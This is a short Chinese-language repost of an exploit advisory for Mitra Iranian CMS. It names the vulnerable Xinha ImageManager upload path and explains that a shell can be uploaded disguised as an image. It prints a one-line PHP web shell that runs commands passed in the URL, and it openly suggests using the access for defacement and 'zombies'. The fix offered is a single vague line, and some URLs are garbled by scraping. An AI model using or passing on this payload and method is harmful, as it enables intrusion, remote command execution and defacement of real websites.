标题: Mitra Iranian CMS Remote File Upload 作者: #BHG Security Center HdhCmsTest2cto测试数据 Nitrojen90 开发网站:http://HdhCmsTestnationalcms.ir/ 影响版本: 全系列 危险等级::High 测试 系统 平台: Windows 测试示例: # # http://HdhCmsTest2cto测试数据 /plugins/editors/xinha/plugins/ImageManager/manager.php # # 通过JPG - GIF - PNG格式上传shell In Bug URL and clike the Photo # # in Browser And Run She Shell Or Make RCE Bug For Run Command With Code : # # # <?php # $command = $_GET['command']; # system($command); # ?> # # And Use For Deface - Zombies & ... :D # 修复:加强验证
查看更多关于Mitra Iranian CMS远程文件上传缺陷及修复 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12477